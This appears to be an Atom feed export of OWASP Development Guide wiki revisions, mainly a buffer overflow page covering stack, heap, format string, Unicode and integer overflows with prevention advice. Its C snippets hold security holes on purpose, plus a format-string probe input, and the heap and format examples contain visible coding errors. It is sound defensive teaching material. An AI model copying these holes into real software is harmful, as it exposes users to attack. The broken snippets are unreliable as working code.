* w00 w00 and Matt Conover, ''Preliminary Heap Overflow Tutorial''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w00w00.org/files/articles/heaptut.txt&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Chris Anley, ''Creating Arbitrary Shellcode In Unicode Expanded Strings''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ngssoftware.com/papers/unicodebo.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* David Leblanc, ''Integer Handling with the C++ SafeInt Class ''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure01142004.asp&amp;lt;/u&amp;gt;     &lt;br /&gt;
&lt;br /&gt;
* Aleph One, ''Smashing the Stack for fun and profit''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.phrack.org/phrack/49/P49-14&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Mark Donaldson, ''Inside the buffer Overflow Attack: Mechanism, method, &amp;amp; prevention''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://rr.sans.org/code/inside_buffer.php&amp;lt;/u&amp;gt;   [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* ''NX Bit'', Wikipedia article&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://en.wikipedia.org/wiki/NX_bit&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Horizon'', How to bypass Solaris no execute stack protection&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;u&amp;gt;http://www.secinf.net/unix_security/How_to_bypass_Solaris_nonexecutable_stack_protection_.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Alexander Anisimov'', Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass'', Positive Technologies&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.maxpatrol.com/defeating-xpsp2-heap-protection.htm&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Matt Conover, w00w00 on Heap Overflows, w00w00 Security Team&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w00w00.org/files/articles/heaptut.txt&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Blexim, ''Basic Integer Overflows&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;u&amp;gt;http://www.phrack.org/phrack/60/p60-0x0a.txt&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* StackShield&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.angelfire.com/sk/stackshield/index.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* StackGuard&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.immunix.org&amp;lt;/u&amp;gt;[[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Libsafe&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.research.avayalabs.com/project/libsafe&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59853</id>
		<title>Buffer Overflows</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59853"/>
				<updated>2009-05-02T11:39:06Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Description */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__'''&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that:&lt;br /&gt;
&lt;br /&gt;
* Applications do not expose themselves to faulty components.&lt;br /&gt;
&lt;br /&gt;
* Applications create as few buffer overflows as possible.&lt;br /&gt;
&lt;br /&gt;
* Developers are encouraged to use languages and frameworks that are relatively immune to buffer overflows.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
Almost every platform, with the following notable exceptions:&lt;br /&gt;
&lt;br /&gt;
* Java/J2EE – as long as native methods or system calls are not invoked.&lt;br /&gt;
&lt;br /&gt;
* .NET – as long as unsafe or unmanaged code is not invoked (such as the use of P/Invoke or COM Interop).&lt;br /&gt;
&lt;br /&gt;
* PHP, Python, Perl – as long as external programs or vulnerable extensions are not used.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11.9 – Data processing integrity.&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Attackers generally use [[Buffer Overflow|buffer overflows]] to corrupt the execution stack of a web application. By sending carefully crafted input to a web application, an attacker can cause the web application to execute arbitrary code, possibly taking over the machine. Attackers have managed to identify buffer overflows in a staggering array of products and components. &lt;br /&gt;
&lt;br /&gt;
Buffer overflow flaws can be present in both the web server and application server products that serve the static and dynamic portions of a site, or in the web application itself. Buffer overflows found in commonly-used server products are likely to become widely known and can pose a significant risk to users of these products. When web applications use libraries, such as a graphics library to generate images or a communications library to send e-mail, they open themselves to potential buffer overflow attacks. Literature detailing buffer overflow attacks against commonly-used products is readily available, and newly discovered vulnerabilities are reported almost daily. &lt;br /&gt;
&lt;br /&gt;
Buffer overflows can also be found in custom web application code, and may even be more likely, given the lack of scrutiny that web applications typically go through. Buffer overflow attacks against customized web applications can sometimes lead to interesting results. In some cases, we have discovered that sending large inputs can cause the web application or the back-end database to malfunction. It is possible to cause a denial of service attack against the web site, depending on the severity and specific nature of the flaw. Overly large inputs could cause the application to display a detailed error message, potentially leading to a successful attack on the system.&lt;br /&gt;
&lt;br /&gt;
Buffer overflow attacks generally rely upon two techniques (and usually the combination):&lt;br /&gt;
&lt;br /&gt;
* Writing data to particular memory addresses&lt;br /&gt;
&lt;br /&gt;
* Having the operating system mishandle data types&lt;br /&gt;
&lt;br /&gt;
* This means that strongly-typed programming languages (and environments) that disallow direct memory access usually prevent buffer overflows from happening.&lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
|-&lt;br /&gt;
 ! Language/Environment !! Compiled or Interpreted !! Strongly Typed !! Direct Memory Access !! Safe or Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Java, Java Virtual Machine (JVM) || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || .NET || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Perl  || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Python - interpreted || Intepreted || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Ruby || Interpreted || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || C/C++ || Compiled || No || Yes || Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Assembly || Compiled || No || Yes || Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || COBOL || Compiled || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
Table 8.1: Language descriptions&lt;br /&gt;
&lt;br /&gt;
==General Prevention Techniques ==&lt;br /&gt;
&lt;br /&gt;
A number of general techniques to prevent buffer overflows include:&lt;br /&gt;
&lt;br /&gt;
* Code auditing (automated or manual)&lt;br /&gt;
&lt;br /&gt;
* Developer training – bounds checking, use of unsafe functions, and group standards&lt;br /&gt;
&lt;br /&gt;
* Non-executable stacks – many operating systems have at least some support for this&lt;br /&gt;
&lt;br /&gt;
* Compiler tools – StackShield, StackGuard, and Libsafe, among others&lt;br /&gt;
&lt;br /&gt;
* Safe functions – use strncat instead of strcat, strncpy instead of strcpy, etc&lt;br /&gt;
&lt;br /&gt;
* Patches – Be sure to keep your web and application servers fully patched, and be aware of bug reports relating to applications upon which your code is dependent.&lt;br /&gt;
&lt;br /&gt;
* Periodically scan your application with one or more of the commonly available scanners that look for buffer overflow flaws in your server products and your custom web applications. &lt;br /&gt;
&lt;br /&gt;
==Stack Overflow ==&lt;br /&gt;
&lt;br /&gt;
Stack overflows are the best understood and the most common form of buffer overflows. The basics of a stack overflow is simple:&lt;br /&gt;
&lt;br /&gt;
* There are two buffers, a source buffer containing arbitrary input (presumably from the attacker), and a destination buffer that is too small for the attack input. The second buffer resides on the stack and somewhat adjacent to the function return address on the stack.&lt;br /&gt;
&lt;br /&gt;
* The faulty code does ''not'' check that the source buffer is too large to fit in the destination buffer. It copies the attack input to the destination buffer, overwriting additional information on the stack (such as the function return address).&lt;br /&gt;
&lt;br /&gt;
* When the function returns, the CPU unwinds the stack frame and pops the (now modified) return address from the stack.&lt;br /&gt;
&lt;br /&gt;
* Control does not return to the function as it should. Instead, arbitrary code (chosen by the attacker when crafting the initial input) is executed. &lt;br /&gt;
&lt;br /&gt;
The following example, written in C, demonstrates a stack overflow exploit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void f(char* s) {&lt;br /&gt;
    char buffer[10];&lt;br /&gt;
    strcpy(buffer, s);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
void main(void) {&lt;br /&gt;
    f(&amp;quot;01234567890123456789&amp;quot;);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./stacktest&lt;br /&gt;
&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values or non-executable stacks to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Heap Overflow ==&lt;br /&gt;
&lt;br /&gt;
Heap overflows are problematic in that they are not necessarily protected by CPUs capable of using non-executable stacks. A heap is an area of memory allocated by the application at run-time to store data. The following example, written in C, shows a heap overflow exploit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define BSIZE 16&lt;br /&gt;
 #define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */&lt;br /&gt;
&lt;br /&gt;
 void main(void) {&lt;br /&gt;
    u_long b_diff;&lt;br /&gt;
    char *buf0 = (char*)malloc(BSIZE);		// create two buffers&lt;br /&gt;
    char *buf1 = (char*)malloc(BSIZE);&lt;br /&gt;
&lt;br /&gt;
    b_diff = (u_long)buf1 - (u_long)buf0;	// difference between locations&lt;br /&gt;
    printf(&amp;quot;Initial values:  &amp;quot;);&lt;br /&gt;
    printf(&amp;quot;buf0=%p, buf1=%p, b_diff=0x%x bytes\n&amp;quot;, buf0, buf1, b_diff);&lt;br /&gt;
&lt;br /&gt;
    memset(buf1, 'A', BUFSIZE-1), buf1[BUFSIZE-1] = '\0';&lt;br /&gt;
    printf(&amp;quot;Before overflow: buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
&lt;br /&gt;
    memset(buf0, 'B', (u_int)(diff + OVERSIZE));&lt;br /&gt;
    printf(&amp;quot;After overflow:  buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./heaptest&lt;br /&gt;
&lt;br /&gt;
Initial values:  buf0=0x9322008, buf1=0x9322020, diff=0xff0 bytes&lt;br /&gt;
Before overflow: buf1=AAAAAAAAAAAAAAA&lt;br /&gt;
After overflow:  buf1=BBBBBBBBAAAAAAA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The simple program above shows two buffers being allocated on the heap, with the first buffer being overflowed to overwrite the contents of the second buffer. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language)  that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Format String ==&lt;br /&gt;
&lt;br /&gt;
Format string buffer overflows (usually called &amp;quot;format string vulnerabilities&amp;quot;) are highly specialized buffer overflows that can have the same effects as other buffer overflow attacks. Basically, format string vulnerabilities take advantage of the mixture of data and control information in certain functions, such as C/C++'s printf. The easiest way to understand this class of vulnerability is with an example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
#include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void main(void) {&lt;br /&gt;
    char str[100] = scanf(&amp;quot;%s&amp;quot;);&lt;br /&gt;
    printf(&amp;quot;%s&amp;quot;, str);&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This simple program takes input from the user and displays it back on the screen. The string &amp;lt;code&amp;gt;%s&amp;lt;/code&amp;gt; means that the other parameter, str, should be displayed as a string. This example is ''not'' vulnerable to a format string attack, but if one changes the last line, it becomes exploitable:&lt;br /&gt;
&lt;br /&gt;
    printf(str);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To see how, consider the user entering the special input:&lt;br /&gt;
&lt;br /&gt;
''%08x.%08x.%08x.%08x.%08x''&lt;br /&gt;
&lt;br /&gt;
By constructing input as such, the program can be exploited to print the first five entries from the stack.  &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* uses functions such as printf, snprintf directly, or indirectly through system services (such as syslog) or other AND&lt;br /&gt;
&lt;br /&gt;
* the use of such functions allows input from the user to contain control information interpreted by the function itself&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. Specifically check for control information (meta-characters like '%')&lt;br /&gt;
# Avoid the use of functions like printf that allow user input to contain control information&lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Unicode Overflow ==&lt;br /&gt;
&lt;br /&gt;
Unicode exploits are a bit more difficult to do than typical buffer overflows as demonstrated in Anley’s 2002 paper, but it is wrong to assume that by using Unicode, you are protected against buffer overflows. Examples of Unicode overflows include Code Red, a devastating Trojan with an estimated economic cost in the billions of dollars. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* takes Unicode input from a user AND&lt;br /&gt;
&lt;br /&gt;
* fails to sanitize the input AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself  ===&lt;br /&gt;
&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Integer Overflow ==&lt;br /&gt;
&lt;br /&gt;
When an application takes two numbers of fixed word size and perform an operation with them, the result may not fit within the same word size. For example, if the two 8-bit numbers 192 and 208 are added together and stored into another 8-bit byte, the result will not fit into an 8-bit result:&lt;br /&gt;
&lt;br /&gt;
''         1100 0000''&lt;br /&gt;
&lt;br /&gt;
''  +      1101 0000''&lt;br /&gt;
&lt;br /&gt;
''  = 0001 1001 0000''&lt;br /&gt;
&lt;br /&gt;
Although such an operation will usually cause some type of exception, your application must be coded to check for such an exception and take proper action. Otherwise, your application would report that 192 + 208 equals 144.&lt;br /&gt;
&lt;br /&gt;
The following code demonstrates a buffer overflow, and was adapted from [http://www.phrack.org/phrack/60/p60-0x0a.txt Blexim's Phrack article]:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void main(int argc, char *argv[]) {&lt;br /&gt;
    int i = atoi(argv[1]);         // input from user&lt;br /&gt;
    unsigned short s = i;          // truncate to a short&lt;br /&gt;
    char buf[50];                  // large buffer&lt;br /&gt;
&lt;br /&gt;
    if (s &amp;gt; 10) {                  // check we're not greater than 10&lt;br /&gt;
        return;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    memcpy(buf, argv[2], i);       // copy i bytes to the buffer&lt;br /&gt;
    buf[i] = '\0';                 // add a null byte to the buffer&lt;br /&gt;
    printf(&amp;quot;%s\n&amp;quot;, buf);           // output the buffer contents&lt;br /&gt;
&lt;br /&gt;
    return;&lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./inttest 65580 foobar&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The above code is exploitable because the validation does not occur on the input value (65580), but rather the value after it has been converted to an unsigned short (45). &lt;br /&gt;
&lt;br /&gt;
Integer overflows can be a problem in any language and can be exploited when integers are used in array indices and implicit short math operations. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Examine use of signed integers, bytes, and shorts.&lt;br /&gt;
&lt;br /&gt;
* Are there cases where these values are used as array indices after performing an arithmetic operation (+, -, *, /, or % (modulo))?&lt;br /&gt;
&lt;br /&gt;
* How would your program react to a negative or zero value for integer values, particular during array lookups?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* If using .NET, use David LeBlanc’s SafeInt class or a similar construct. Otherwise, use a &amp;quot;BigInteger&amp;quot; or &amp;quot;BigDecimal&amp;quot; implementation in cases where it would be hard to validate input yourself.&lt;br /&gt;
&lt;br /&gt;
* If your compiler supports the option, change the default for integers to be unsigned unless otherwise explicitly stated. Use unsigned integers whenever you don't need negative values.&lt;br /&gt;
&lt;br /&gt;
* Use range checking if your language or framework supports it, or be sure to implement range checking yourself after all arithmetic operations.&lt;br /&gt;
&lt;br /&gt;
* Be sure to check for exceptions if your language supports it.&lt;br /&gt;
&lt;br /&gt;
==Further reading ==&lt;br /&gt;
&lt;br /&gt;
* Team Teso, ''Exploiting Format String Vulnerabilities''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.cs.ucsb.edu/~jzhou/security/formats-teso.html&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Newsham, Tim, ''Format String Attacks&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;u&amp;gt;http://www.lava.net/~newsham/format-string-attacks.pdf&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* w00 w00 and Matt Conover, ''Preliminary Heap Overflow Tutorial''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w00w00.org/files/articles/heaptut.txt&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Chris Anley, ''Creating Arbitrary Shellcode In Unicode Expanded Strings''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ngssoftware.com/papers/unicodebo.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* David Leblanc, ''Integer Handling with the C++ SafeInt Class ''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure01142004.asp&amp;lt;/u&amp;gt;     &lt;br /&gt;
&lt;br /&gt;
* Aleph One, ''Smashing the Stack for fun and profit''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.phrack.org/phrack/49/P49-14&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Mark Donaldson, ''Inside the buffer Overflow Attack: Mechanism, method, &amp;amp; prevention''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://rr.sans.org/code/inside_buffer.php&amp;lt;/u&amp;gt;   [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* ''NX Bit'', Wikipedia article&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://en.wikipedia.org/wiki/NX_bit&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Horizon'', How to bypass Solaris no execute stack protection&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;u&amp;gt;http://www.secinf.net/unix_security/How_to_bypass_Solaris_nonexecutable_stack_protection_.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Alexander Anisimov'', Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass'', Positive Technologies&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.maxpatrol.com/defeating-xpsp2-heap-protection.htm&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Matt Conover, w00w00 on Heap Overflows, w00w00 Security Team&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w00w00.org/files/articles/heaptut.txt&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Blexim, ''Basic Integer Overflows&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;u&amp;gt;http://www.phrack.org/phrack/60/p60-0x0a.txt&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* StackShield&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.angelfire.com/sk/stackshield/index.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* StackGuard&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.immunix.org&amp;lt;/u&amp;gt;[[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Libsafe&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.research.avayalabs.com/project/libsafe&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File_System&amp;diff=59852</id>
		<title>File System</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File_System&amp;diff=59852"/>
				<updated>2009-05-02T11:34:52Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* File upload */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that access to the local file system of any of the systems is protected from unauthorized creation, modification, or deletion.&lt;br /&gt;
&lt;br /&gt;
==Environments Affected ==&lt;br /&gt;
&lt;br /&gt;
All. &lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11 – Manage Data – All sections should be reviewed&lt;br /&gt;
&lt;br /&gt;
DS11.9 – Data processing integrity&lt;br /&gt;
&lt;br /&gt;
DS11.20 – Continued integrity of stored data&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
The file system is a fertile ground for average attackers and script kiddies alike. Attacks can be devastating for the average site, and they are often some of the easiest attacks to perform. &lt;br /&gt;
&lt;br /&gt;
==Best Practices ==&lt;br /&gt;
&lt;br /&gt;
* Use “chroot” jails on Unix platforms&lt;br /&gt;
&lt;br /&gt;
* Use minimal file system permissions on all platforms&lt;br /&gt;
&lt;br /&gt;
* Consider the use of read-only file systems (such as CD-ROM or locked USB key) if practical&lt;br /&gt;
&lt;br /&gt;
==Defacement ==&lt;br /&gt;
&lt;br /&gt;
Defacement is one of the most common attacks against web sites. An attacker uses a tool or technique to upload hostile content over the top of existing files or via configuration mistakes, new files. Defacement can be acutely embarrassing, resulting in reputation loss and loss of trust with users. &lt;br /&gt;
&lt;br /&gt;
There are many defacement archives on the Internet, and most defacements occur due to poor patching of vulnerable web servers, but the next most common form of defacement occurs due to web application vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Is your system up to date? &lt;br /&gt;
&lt;br /&gt;
* Does the file system allow writing via the web user to the web content (including directories?)&lt;br /&gt;
&lt;br /&gt;
* Does the application write files with user supplied file names?&lt;br /&gt;
&lt;br /&gt;
